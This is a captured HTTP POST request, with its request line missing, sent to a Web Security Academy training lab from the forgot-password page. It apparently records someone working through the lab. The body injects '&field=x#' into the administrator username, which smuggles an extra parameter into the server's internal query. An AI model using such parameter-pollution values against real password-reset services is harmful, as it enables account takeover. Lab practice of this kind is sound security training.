Host: 0a9c00e5036ed0b780da261100030003.web-security-academy.net
Cookie: session=lbXzsdRlJe7pQfC2lusw7fwiXfJTMbzR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a9c00e5036ed0b780da261100030003.web-security-academy.net/forgot-password
Content-Type: x-www-form-urlencoded
Content-Length: 73
Origin: https://0a9c00e5036ed0b780da261100030003.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

csrf=ikmm4YrRnWXHWH0yzP6tBwWqPTOTas2J&username=administrator%26field=x%23
